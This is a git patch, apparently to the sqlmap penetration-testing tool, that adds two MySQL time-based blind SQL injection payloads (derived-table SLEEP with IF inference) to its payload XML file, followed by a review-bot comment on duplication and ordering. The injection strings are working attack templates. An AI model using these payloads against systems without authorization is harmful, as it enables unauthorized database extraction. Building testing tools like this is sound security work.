From 66c2a7939761a54cefce5aead662bfd2f2716608 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Tue, 3 Feb 2015 15:14:41 +0000
Subject: [PATCH] added a time-based payload for MySQL when the simpler AND SLEEP(X) does not work
---
xml/payloads.xml | 41 +++++++++++++++++++++++++++++++++++++++++
1 file changed, 41 insertions(+)
diff --git a/xml/payloads.xml b/xml/payloads.xml
index c85aedd63..5fb16dc72 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2454,6 +2454,47 @@ Formats:
+
+ MySQL > 5.0.11 AND time-based blind (SELECT)
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 AND time-based blind (SELECT - comment)
+ 5
+ 4
+ 1
+ 1,2,3
+ 1
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+ MySQL > 5.0.11 AND time-based blind 5
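Review bot: The reason these two entries exist is recorded only in the commit subject; nothing in the added entries says when the derived-table form applies instead of the plain `AND SLEEP([SLEEPTIME])` test that follows them in the file. An XML comment above the first new entry, for example `<!-- Derived-table variant of the SLEEP() test, for cases where the plain AND SLEEP() form shows no delay -->`, would keep that rationale next to the data. The two entries repeat the same vector and payload strings and, as far as this rendering shows, differ only in one numeric field (1 versus 4), the `(SELECT - comment)` title and the trailing `#`, so a later change to one is easy to miss in the other. The first new entry also sits ahead of the existing plain test with the same leading values; if entries are evaluated in file order, it runs before the simpler test rather than as the fallback the subject describes, which is worth confirming. The element names are not visible on this page, so the field meanings here are inferred.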